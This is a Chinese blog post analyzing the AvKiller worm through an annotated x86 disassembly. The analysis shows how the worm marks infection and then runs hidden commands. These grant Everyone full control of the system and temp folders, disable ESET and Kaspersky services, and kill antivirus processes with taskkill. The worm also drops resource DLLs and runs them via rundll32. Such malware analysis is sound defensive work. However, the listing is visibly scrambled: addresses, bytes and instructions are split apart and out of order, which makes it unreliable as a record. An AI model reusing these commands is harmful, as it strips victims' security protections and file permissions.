探索黑客技术攻防,实战研究与安全创新

导航菜单
首页 » 木马分析 » 正文

AvKiller病毒分析

2016年07月03日 木马分析 19876 views

Worm.Win32.AvKiller.be是一个蠕虫病毒,利用Upack程序进行保护病毒会利用CreateMutex创建一个system的互斥,保证系统中只有一个实例在运行,如这个互斥已经存在,则病毒直接退出下面是详细分析,每一步的过程都加了详细的注释。本文内容所提及均为本地测试,旨在提供教育和研究信息,内容已去除关键敏感信息和代码,以防止被恶意利用。作者不鼓励或支持任何形式的非法行为。


////////////////////////////////////////////////////////////////////////////////
//
//------------------------------------------------------------------------------
//MalwareOriginalEntryPoint
//------------------------------------------------------------------------------
//
0040118C
0040118D
0040118F
55
PUSHEBP
8BEC
MOVEBP,ESP
81EC000B0000SUBESP,0B00
//------------------------------------------------------------------------------
//
checkinfection--sny_trojan,ifnot,markthispcfirstly
//------------------------------------------------------------------------------
00401195
00401196
ESI,00403688
0040119B
0040119C
0040119D
[402050]
56
PUSHESI
BE
88364000
MOV
;ASCIIsny_trojan
57
56
PUSHEDI
PUSHESI
FF15
50204000
CALL
;kernel32.GlobalFindAtomA(sny_trojan)
004011A3
004011A6
004011A8
004011AA
004011AB
004011AC
004011B1
[40204C]
004011B7
004011B9
004011BB
004011BD
004011C2
004011C3
004011C4
66:85C0
7713
33FF
TESTAX,AX
JASHORT004011BB
XOREDI,EDI
PUSHESI
56
57
PUSHEDI
6801001F00
PUSH1F0001
FF15
4C204000
CALL
;kernel32.OpenMutexAsny_trojan
TESTEAX,EAX
85C0
7407
33C0
E9B2030000
53
JESHORT004011C2
XOREAX,EAX
JMP00401574
PUSHEBX
56
PUSHESI
FF15
48204000
CALL
[402048]
;kernel32.GlobalAddAtomAsny_trojan
004011CA
004011CB
004011CC
004011CD
[402044]
56
57
57
PUSHESI
PUSHEDI
PUSHEDI
FF15
44204000
CALL
;kernel32.CreateMutexA-sny_trojan
//------------------------------------------------------------------------------
//Gettheyear,andifit'safter2007now,gotokillAv
//------------------------------------------------------------------------------
004011D3
004011D6
004011D7
[402024]
8D45F0
50
LEAEAX,[EBP-10]
PUSHEAX
FF15
24204000
CALL
PTR
;kernel32.GetSystemTime
004011DD
[EBP-10],7D7
004011E3
66:817D
F0
D707
CMP
WORD
;2007=7D7
8B3D
60204000
MOV
MOV
EDI,[402060]
004011E9
;MSVCRT.sprintf
8B1D
40204000
EBX,[402040]
004011EF
004011F4
;kernel32.WinExec
MOVESI,104
BE04010000
0F8631010000JBE0040132B
//------------------------------------------------------------------------------
//EditACLsof%SystemRoot%Directory--FullControl
//------------------------------------------------------------------------------
004011FA
00401200
00401201
00401202
[402010]
00401208
0040120E
0040120F
00401215
00403664
0040121A
0040121B
EDI
8D85ECFEFFFF
LEAEAX,[EBP-114]
PUSHESI
56
50
PUSHEAX
FF15
10204000
CALL
PUSH
;kernel32.GetSystemDirectoryA
LEAEAX,[EBP-114]
8D85ECFEFFFF
50
PUSHEAX
8D85E8FDFFFF
LEAEAX,[EBP-218]
68
64364000
;ASCIIcmd/ccacls%s/e/peveryone:f
PUSHEAX
50
FFD7
CALL
;sprintfcmd/ccaclsSystemDirectory/e/p
everyone:f
0040121D
00401220
00401226
00401228
00401229
EBX
83C40C
8D85E8FDFFFF
6A00
ADDESP,0C
LEAEAX,[EBP-218]
PUSH0
50
PUSHEAX
FFD3
CALL
;WinExec(SW_HIDE)cmd/ccacls
SystemDirectory/e/peveryone:f
//------------------------------------------------------------------------------
//EditACLsof%Temp%Directory--FullControl
//------------------------------------------------------------------------------
0040122B
00401231
00401232
00401233
[40203C]
00401239
0040123F
00401240
00401246
00403640
everyone:f
0040124B
0040124C
EDI
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
CALL
;kernel32.GetTempPathA
8D85ECFEFFFF
50
LEAEAX,[EBP-114]
PUSHEAX
8D85E8FDFFFF
LEAEAX,[EBP-218]
68
40364000
PUSH
;ASCIIcmd/ccacls%s/e/p
50
PUSHEAX
FFD7
CALL
;sprintf
0040124E
00401251
00401257
00401259
0040125A
EBX
83C40C
8D85E8FDFFFF
6A00
ADDESP,0C
LEAEAX,[EBP-218]
PUSH0
50
PUSHEAX
FFD3
CALL
;WinExec(SW_HIDE)cmd/c
cacls%TEMP%/e/peveryone:f
0040125C
00401262
00401263
00401264
[40203C]
0040126A
00401270
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
CALL
;kernel32.GetTempPathA
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
50
//------------------------------------------------------------------------------
//disabletheservice(ekrn)ofESETNOD32
//cmd/cscconfigekrnstart=disabled
//------------------------------------------------------------------------------
00401271
00401277
00403618
disabled
0040127C
0040127D
EDI
8D85E8FDFFFF
LEAEAX,[EBP-218]
68
18364000
PUSH
;ASCIIcmd/cscconfigekrnstart=
50
PUSHEAX
FFD7
CALL
;sprintf
0040127F
00401282
00401288
0040128A
0040128B
EBX
83C40C
8D85E8FDFFFF
6A00
ADDESP,0C
LEAEAX,[EBP-218]
PUSH0
50
PUSHEAX
FFD3
CALL
CALL
;WinExec
0040128D
00401293
00401294
00401295
[40203C]
0040129B
004012A1
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
;kernel32.GetTempPathA
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
50
//------------------------------------------------------------------------------
//killtheprocess(ekrn.exe)ofESETNOD32
//cmd/ctaskkill/imekrn.exe/f
//------------------------------------------------------------------------------
004012A2
004012A8
004035F8
004012AD
004012AE
EDI
8D85E8FDFFFFLEAEAX,[EBP-218]
68
F8354000
PUSH
;ASCIIcmd/ctaskkill/imekrn.exe/f
50
PUSHEAX
FFD7
CALL
CALL
CALL
;sprintf
004012B0
004012B3
004012B9
004012BB
004012BC
EBX
83C40C
ADDESP,0C
8D85E8FDFFFFLEAEAX,[EBP-218]
6A00
50
PUSH0
PUSHEAX
FFD3
;WinExec
004012BE
004012C4
004012C5
004012C6
[40203C]
004012CC
004012D2
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
;kernel32.GetTempPathA
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
50
//------------------------------------------------------------------------------
//killtheprocess(egui.exe)ofESETNOD32
//cmd/ctaskkill/imegui.exe/f
//------------------------------------------------------------------------------
004012D3
004012D9
8D85E8FDFFFFLEAEAX,[EBP-218]
68
D8354000
PUSH
004035D8
004012DE
004012DF
004012E1
004012E4
004012EA
004012EC
004012ED
;ASCIIcmd/ctaskkill/imegui.exe/f
50
PUSHEAX
CALLEDI
FFD7
83C40C
8D85E8FDFFFF
6A00
ADDESP,0C
LEAEAX,[EBP-218]
PUSH0
50
PUSHEAX
FFD3
CALLEBX
004012EF
004012F5
004012F6
004012F7
[40203C]
004012FD
00401303
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
CALL
;kernel32.GetTempPathA
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
50
//------------------------------------------------------------------------------
//killtheprocess(ScanFrm.exe)ofRsing
//cmd/ctaskkill/imScanFrm.exe/f
//------------------------------------------------------------------------------
00401304
0040130A
004035B4
/f
8D85E8FDFFFF
LEAEAX,[EBP-218]
68
B4354000
PUSH
;ASCIIcmd/ctaskkill/imScanFrm.exe
0040130F
00401310
EDI
50
PUSHEAX
FFD7
CALL
;sprintf
00401312
00401315
0040131B
0040131D
0040131E
EBX
83C40C
8D85E8FDFFFF
6A00
ADDESP,0C
LEAEAX,[EBP-218]
PUSH0
50
PUSHEAX
FFD3
CALL
CALL
;WinExec
PUSH1388
FF15
00401320
00401325
[402038]
\system32\killkb.dll
0040132B
00401331
00401332
00401333
[402034]
00401339
0040133F
6888130000
38204000
;kernel32.Sleep//strcat%windows%+
8D85E4FCFFFF
LEAEAX,[EBP-31C]
56
50
PUSHESI
PUSHEAX
FF15
34204000
CALL
PUSH
;kernel32.GetWindowsDirectoryA
LEAEAX,[EBP-31C]
8D85E4FCFFFF
68
9C354000
0040359C
00401344
;ASCII\system32\killkb.dll
PUSHEAX
3A020000
50
00401345
E8
CALL
00401584
;c:\windows\\system32\killkb.dll
MSVCRT.strcat
//------------------------------------------------------------------------------
//checktheyear,ifitsbefore2007nown,skipthefollows
//andgoto
0040138D
//------------------------------------------------------------------------------
0040134A
00401350
00401351
00401352
66:817DF0D707CMPWORDPTR[EBP-10],7D7
59
POPECX
59
POPECX
7639
JBESHORT0040138D
//------------------------------------------------------------------------------
//after2007
//WriteReSourceToFile(BIN,95,%windows%+\system32\killkb.dll)
//execrundll32.exe%windows%+\system32\killkb.dll,droqp
//------------------------------------------------------------------------------
00401354
EAX,[EBP-31C]
0040135A
0040135B
00403598
00401360
00401365
00401000
8D85
E4FCFFFF
LEA
;%windows%+\system32\killkb.dll
50
PUSHEAX
68
98354000
PUSH
;ASCIIBIN
6895000000
PUSH95
E8
96FCFFFF
CALL
;
WriteReSourceToFile(BIN,95,%windows%+\system32\killkb.dll))
//rundll32.exe%windows%+\system32\killkb.dll,droqp
0040136A
00401370
00401371
00401377
00403580
0040137C
0040137D
EDI
8D85E4FCFFFF
50
LEAEAX,[EBP-31C]
PUSHEAX
8D8500F5FFFF
LEAEAX,[EBP-B00]
68
80354000
PUSH
CALL
;ASCIIrundll32.exe%s,droqp
PUSHEAX
;sprintf
50
FFD7
0040137F
00401382
00401388
0040138A
0040138B
EBX
83C418
8D8500F5FFFF
6A00
ADDESP,18
LEAEAX,[EBP-B00]
PUSH0
50
PUSHEAX
FFD3
CALL
;WinExec(rundll32.exe%windows%
+\system32\killkb.dll,droqp,SW_HIDE)
//------------------------------------------------------------------------------
//
forall(beforandafter2007)
//------------------------------------------------------------------------------
0040138D
00401392
[402038]
00401398
0040139E
0040139F
004013A0
[40203C]
6888130000
PUSH1388
FF15
38204000
CALL
CALL
;kernel32.Sleep
8D85ECFEFFFF
LEAEAX,[EBP-114]
PUSHEAX
PUSHESI
50
56
FF15
3C204000
;kernel32.GetTempPathA
//------------------------------------------------------------------------------
//disabletheservice(avp)ofkav
//cmd/cscconfigavpstart=disabled
//------------------------------------------------------------------------------
004013A6
004013AC
004013AD
004013B3
00403558
disabled
004013B8
004013B9
EDI
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
8D85E8FDFFFFLEAEAX,[EBP-218]
50
68
58354000
PUSH
;ASCIIcmd/cscconfigavpstart=
50
PUSHEAX
FFD7
CALL
;sprintf
ADDESP,0C
004013BB
004013BE
004013C4
004013C6
004013C7
EBX
83C40C
8D85E8FDFFFFLEAEAX,[EBP-218]
6A00
50
PUSH0
PUSHEAX
FFD3
CALL
;WinExec
//------------------------------------------------------------------------------
//killtheprocess(avp.exe)ofkav
//cmd/ctaskkill/imavp.exe/f
//------------------------------------------------------------------------------
004013C9
004013CF
004013D0
004013D1
[40203C]
004013D7
004013DD
004013DE
004013E4
00403538
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
CALL
PUSH
;kernel32.GetTempPathA
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
8D85E8FDFFFFLEAEAX,[EBP-218]
50
68
38354000
;ASCIIcmd/ctaskkill/imavp.exe/f
004013E9
004013EA
EDI
50
PUSHEAX
FFD7
CALL
;sprintf
004013EC
004013EF
004013F5
004013F7
004013F8
EBX
83C40C
ADDESP,0C
8D85E8FDFFFFLEAEAX,[EBP-218]
6A00
50
PUSH0
PUSHEAX
FFD3
CALL
MOV
;WinExec
8B3D
004013FA
EDI,[402038]
00401400
38204000
;kernel32.Sleep
6888130000
FFD7
PUSH1388
CALLEDI
00401405
//------------------------------------------------------------------------------
//writefilec:\WINDOSupdate.dllfromresource
//WriteEncryptedReSourceToFileWithAnti(8F,BIN,c:\WINDOWSupdate.dll)
//------------------------------------------------------------------------------
00401407
0040140D
0040140E
0040140F
[402034]
8D85E4FCFFFF
LEAEAX,[EBP-31C]
PUSHESI
56
50
PUSHEAX
FF15
34204000
CALL
;kernel32.GetWindowsDirectoryA
//strcat%windows%+\system32\update.dll
00401415
0040141B
0040352C
00401420
00401421
00401584
00401426
0040142C
0040142D
0040142E
00401434
00401435
00401436
EBX
8D85E4FCFFFF
LEAEAX,[EBP-31C]
68
2C354000
PUSH
CALL
;ASCIIupdate.dll
50
PUSHEAX
E8
5E010000
;MSVCRT.strcat
8B1D10204000MOVEBX,[402010]
59
POPECX
59
POPECX
8D85E0FBFFFF
LEAEAX,[EBP-420]
PUSHESI
56
50
PUSHEAX
FFD3
CALL
CALL
;kernel32.GetSystemDirectoryA
00401438
0040143E
0040143F
00401440
EBX
8D85E0FBFFFF
LEAEAX,[EBP-420]
PUSHESI
56
50
PUSHEAX
FFD3
;kernel32.GetSystemDirectoryA
00401442
00401448
00401449
0040144A
0040144C
[402030]
8D85E0FBFFFF
LEAEAX,[EBP-420]
PUSHESI
56
50
PUSHEAX
PUSH0
6A00
FF15
30204000
CALL
PUSH
;kernel32.GetModuleFileNameA
LEAEAX,[EBP-31C]
PUSHEAX
00401452
00401458
00401459
00403598
0040145E
00401463
004010AC
8D85E4FCFFFF
50
68
98354000
;ASCIIBIN
688F000000
PUSH8F
E8
44FCFFFF
CALL
;
WriteEncryptedReSourceToFileWithAnti(8F,BIN,c:\WINDOWSupdate.dll)
//copymodulefilename
00401468
0040146A
00401470
00401475
00401476
0040157E
0040147B
00401481
00401482
00401488
00401489
00401578
6A00
PUSH0
8D8504F6FFFF
68DC050000
50
LEAEAX,[EBP-9FC]
PUSH5DC
PUSHEAX
E8
03010000
CALL
CALL
;JMPtoMSVCRT.memset
8D85E0FBFFFF
LEAEAX,[EBP-420]
PUSHEAX
50
8D8504F6FFFF
50
LEAEAX,[EBP-9FC]
PUSHEAX
E8
EA000000
;JMPtoMSVCRT.strcpy
//ModuleFileName+_
0040148E
00401493
00401499
0040149A
0040149B
00401584
BE28354000
MOVESI,00403528
LEAEAX,[EBP-9FC]
PUSHESI
8D8504F6FFFF
56
50
PUSHEAX
E8
E4000000
CALL
;JMPtoMSVCRT.strcat
//ModuleFileName+_+o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
004014A0
0040326C
68
6C324000
PUSH
;ASCII
o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
004014A5
004014AB
004014AC
00401584
8D8504F6FFFF
50
LEAEAX,[EBP-9FC]
PUSHEAX
E8
D3000000
CALL
;JMPtoMSVCRT.strcat
//ModuleFileName+_+o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
//+_
004014B1
004014B7
004014B8
004014B9
00401584
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
E8
C6000000
CALL
;JMPtoMSVCRT.strcat
//ModuleFileName+_+o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
//+_+o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo
004014BE
004014C4
00403210
8D8504F6FFFFLEAEAX,[EBP-9FC]
68
10324000
PUSH
;ASCII
o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo
004014C9
004014CA
00401584
50
PUSHEAX
E8
B5000000
CALL
;JMPtoMSVCRT.strcat
//ModuleFileName+_+o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
//+_+o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo+_
004014CF
004014D2
004014D8
004014D9
004014DA
00401584
83C440
ADDESP,40
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
E8
A5000000
CALL
;JMPtoMSVCRT.strcat
//ModuleFileName+_+o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
//+_+o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo+_+NULL
004014DF
004014E5
004014EA
004014EB
00401584
8D8504F6FFFFLEAEAX,[EBP-9FC]
6808304000
50
PUSH00403008
PUSHEAX
E8
94000000
CALL
CALL
;JMPtoMSVCRT.strcat
//LoadLibrary(c:\WINDOWSupdate.dll)
004014F0
004014F3
004014F9
004014FA
[40202C]
83C410
ADDESP,10
8D85E4FCFFFF
50
LEAEAX,[EBP-31C]
PUSHEAX
FF15
2C204000
;kernel32.LoadLibraryA
//GetProcAddress(Scan,c:\WINDOWSupdate.dll)
00401500
00401502
00401504
00403000
00401509
0040150A
[402028]
85C0
TESTEAX,EAX
JESHORT00401528
7424
68
00304000
PUSH
CALL
;ASCIIScan
50
PUSHEAX
FF15
28204000
;kernel32.GetProcAddress
//callWINDOWSupdate.dll::Scan(0,0,
//ModuleFileName+_+o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
//+_+o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo+_+NULL
//)
00401510
00401512
00401514
0040151A
0040151B
0040151D
0040151F
EAX
85C0
TESTEAX,EAX
JESHORT00401521
LEAECX,[EBP-9FC]
PUSHECX
740D
8D8D04F6FFFF
51
6A00
PUSH0
6A00
PUSH0
FFD0
CALL
CALL
;WINDOWSupdate.dll::Scan
00401521
00401526
EDI
680046C323
PUSH23C34600
FFD7
;Sleep()
00401528
0040152D
00401533
EBX
BE90010000
MOVESI,190
LEAEAX,[EBP-9FC]
PUSHESI
8D8504F6FFFF
56
50
PUSHEAX
FFD3
CALL
CALL
;GetSystemDirectory
00401537
0040153D
0040153E
0040153F
EBX
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
FFD3
;GetSystemDirectory
//checktheyear2008,ifitsbefore2008now,gotoexit
00401541
00401547
66:817DF0D807CMPWORDPTR[EBP-10],7D8
7628
JBESHORT00401571
//.........
00401549
0040154F
00401550
00401551
EBX
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
FFD3
CALL
CALL
;GetSystemDirectory
00401553
00401559
0040155A
0040155B
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
FFD3
EBX
;GetSystemDirectory
LEAEAX,[EBP-9FC]
0040155D
00401563
00401564
00401565
EBX
8D8504F6FFFF
56
50
PUSHESI
PUSHEAX
FFD3
CALL
CALL
;GetSystemDirectory
00401567
0040156D
0040156E
0040156F
EBX
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
FFD3
;GetSystemDirectory
00401571
00401573
00401574
00401575
00401576
00401577
33C0
5B
XOREAX,EAX
POPEBX
POPEDI
POPESI
LEAVE
5F
5E
C9
C3
RET
//------------------------------------------------------------------------------
//WriteReSourceToFile(ResourceName,ResourceType,FilePath)
//------------------------------------------------------------------------------
00401000
00401001
00401003
00401009
0040100A
0040100C
0040100F
00401012
00401013
[402020]
55
PUSHEBP
8BEC
MOVEBP,ESP
81EC10010000SUBESP,110
53
PUSHEBX
33DB
FF750C
FF7508
53
XOREBX,EBX
PUSHDWORDPTR[EBP+C]
PUSHDWORDPTR[EBP+8]
PUSHEBX
FF15
20204000
CALL
;
kernel32.FindResourceA(hModule=NULL,ResourceName=95,ResourceType=BIN)
00401019
0040101A
0040101B
0040101E
[40201C]
50
PUSHEAX
PUSHEBX
MOV[EBP+8],EAX
FF15
53
894508
1C204000
CALL
;
kernel32.LoadResource(hModule=NULL,hResource=handle)
00401024
00401025
00401028
[402018]
0040102E
0040102F
50
PUSHEAX
MOV[EBP-4],EAX
FF15
8945FC
18204000
CALL
;kernel32.SetHandleCount
53
53
PUSHEBX
PUSHEBX
00401030
00401032
00401033
00401034
00401039
0040103C
0040103F
[402014]
6A02
PUSH2
53
PUSHEBX
53
PUSHEBX
6800000040
FF7510
8945F8
PUSH40000000
PUSHDWORDPTR[EBP+10]
MOV[EBP-8],EAX
FF15
14204000
CALL
;
kernel32.CreateFileA(FileName=C:\windows\system32\killkb.dll,Access=GENERIC_WRITE,S
hareMOde=0,pSecurity=NULL,Mode=CREATE_ALWAYS,Attributes=0,hTemplateFile=NULL)
//checkCreateFilefailure
00401045
00401048
[EBP+C],EAX
0040104B
0040104D
0040104E
00401054
00401055
0040105A
00401060
00401061
00401062
ESI
83F8FF
CMPEAX,-1
8945
0C
MOV
;FileHandle
7443
56
JESHORT00401090
PUSHESI
8B3510204000MOVESI,[402010]
57
PUSHEDI
BF04010000
MOVEDI,104
8D85F0FEFFFFLEAEAX,[EBP-110]
57
50
PUSHEDI
PUSHEAX
FFD6
CALL
CALL
;kernel32.GetSystemDirectoryA
8D85F0FEFFFFLEAEAX,[EBP-110]
00401064
0040106A
0040106B
0040106C
ESI
57
50
PUSHEDI
PUSHEAX
FFD6
;kernel32.GetSystemDirectoryA
0040106E
00401071
00401072
00401073
00401076
00401077
[40200C]
0040107D
0040107E
00401081
00401084
[402008]
0040108A
0040108B
8D45F4
53
LEAEAX,[EBP-C]
PUSHEBX
50
PUSHEAX
FF7508
53
PUSHDWORDPTR[EBP+8]
PUSHEBX
FF15
0C204000
CALL
CALL
;kernel32.SizeofResource
50
PUSHEAX
FF75F8
FF750C
PUSHDWORDPTR[EBP-8]
PUSHDWORDPTR[EBP+C]
FF15
08204000
;kernel32.WriteFile
5F
5E
POPEDI
POPESI
0040108C
0040108E
00401090
00401092
00401094
00401097
[402004]
85C0
TESTEAX,EAX
7504
JNZSHORT00401094
XOREAX,EAX
33C0
EB15
FF750C
JMPSHORT004010A9
PUSHDWORDPTR[EBP+C]
FF15
04204000
CALL
CALL
;kernel32.CloseHandle
PUSHDWORDPTR[EBP-4]
0040109D
004010A0
[402000]
FF75FC
FF15
00204000
;kernel32.FreeResource
004010A6
004010A8
004010A9
004010AA
004010AB
6A01
58
PUSH1
POPEAX
POPEBX
LEAVE
RET
5B
C9
C3
//------------------------------------------------------------------------------
//WriteEncryptedReSourceToFileWithAnti(ResourceName,ResourceType,FilePath)
//------------------------------------------------------------------------------
004010AC
004010AD
004010AF
004010B5
004010B6
004010B8
004010BB
004010BE
004010BF
[402020]
55
PUSHEBP
8BEC
MOVEBP,ESP
81EC20010000SUBESP,120
53
PUSHEBX
33DB
FF750C
FF7508
53
XOREBX,EBX
PUSHDWORDPTR[EBP+C]
PUSHDWORDPTR[EBP+8]
PUSHEBX
FF15
20204000
CALL
;kernel32.FindResourceA(NULL,8F,BIN)
004010C5
004010C6
004010C7
004010CA
[40201C]
004010D0
004010D1
004010D4
[402018]
50
PUSHEAX
PUSHEBX
53
894508
MOV[EBP+8],EAX
FF15
1C204000
CALL
CALL
;kernel32.LoadResource
50
PUSHEAX
8945F8
MOV[EBP-8],EAX
FF15
18204000
;kernel32.SetHandleCount
004010DA
004010DB
004010DC
004010DE
004010DF
004010E0
53
PUSHEBX
PUSHEBX
PUSH2
53
6A02
53
PUSHEBX
PUSHEBX
53
6800000040
PUSH40000000
004010E5
004010E8
004010EB
[402014]
FF7510
8945FC
PUSHDWORDPTR[EBP+10]
MOV[EBP-4],EAX
FF15
14204000
CALL
;
kernel32.CreateFileA(c:\WINDOWSupdate.dll,GENERIC_WRITE,0,NULL,CREATE_ALWA
YS,0,NULL)
//checkfailure
004010F1
004010F4
004010F7
004010F9
004010FB
83F8FF
894510
7507
CMPEAX,-1
MOV[EBP+10],EAX
JNZSHORT00401100
XOREAX,EAX
JMP00401189
33C0
E989000000
00401100
00401103
00401104
[402024]
8D45E4
50
LEAEAX,[EBP-1C]
PUSHEAX
FF15
24204000
CALL
;kernel32.GetSystemTime
//checktheyear2007
0040110A66:817DE4D707CMPWORDPTR[EBP-1C],7D7
00401110
00401112
00401113
00401119
0040111A
0040111F
00401125
00401126
00401127
0040112A
ESI
7662
JBESHORT00401174
PUSHESI
56
8B3510204000MOVESI,[402010]
57
PUSHEDI
BF04010000
MOVEDI,104
8D85E0FEFFFFLEAEAX,[EBP-120]
57
PUSHEDI
PUSHEAX
MOV[EBP+F],BL
FFD6
50
885D0F
CALL
CALL
;kernel32.GetSystemDirectoryA
0040112C
00401132
00401133
00401134
ESI
8D85E0FEFFFF
LEAEAX,[EBP-120]
PUSHEDI
57
50
PUSHEAX
FFD6
;kernel32.GetSystemDirectoryA
00401136
00401139
0040113F
00401141
00401142
ESI
FF7508
PUSHDWORDPTR[EBP+8]
8B350C204000MOVESI,[40200C]
33FF
53
XOREDI,EDI
PUSHEBX
FFD6
CALL
;kernel32.SizeofResource
TESTEAX,EAX
00401144
85C0
00401146
762A
JBESHORT00401172
//------------------------------------------------------------------------------
//writefileloop,1byteonce
//------------------------------------------------------------------------------
00401148
0040114B
//decode
0040114C
0040114F
00401151
00401154
00401157
00401158
0040115B
0040115D
0040115E
00401161
[402008]
8B45FC
53
MOVEAX,[EBP-4]
PUSHEBX
8A0407
FEC0
88450F
8D45F4
50
8D450F
6A01
50
MOVAL,[EDI+EAX]
INCAL
MOV[EBP+F],AL
LEAEAX,[EBP-C]
PUSHEAX
LEAEAX,[EBP+F]
PUSH1
PUSHEAX
FF7510
PUSHDWORDPTR[EBP+10]
FF15
08204000
CALL
;
kernel32.WriteFile(hFile,pBuffer,nBytesToWrite=1,pBytesWritten,NULL)
00401167
//++
FF7508
PUSHDWORDPTR[EBP+8]
0040116A
0040116B
0040116C
ESI
47
53
INCEDI
PUSHEBX
FFD6
CALL
;SizeOfResource
//checktheend
0040116E
00401170
//
3BF8
^72D6
CMPEDI,EAX
JBSHORT00401148
00401172
00401173
00401174
00401177
[402004]
00401188
00401189
0040118A
0040118B
00401578
[402064]
0040157E
[402058]
00401584
[40205C]
5F
5E
FF7510
POPEDI
POPESI
PUSHDWORDPTR[EBP+10]
FF15
04204000
CALL
CALL
;kernel32.CloseHandle
PUSHDWORDPTR[EBP-8]
FF75F8
FF15
;kernel32.FreeResource
00204000
6A01
58
5B
C9
C3
PUSH1
POPEAX
POPEBX
LEAVE
RET
-
FF25
;MSVCRT.strcpy
FF25
;MSVCRT.memset
FF25
;MSVCRT.strcat
64204000
JMP
JMP
JMP
-
-
58204000
5C204000

相关推荐

网站分类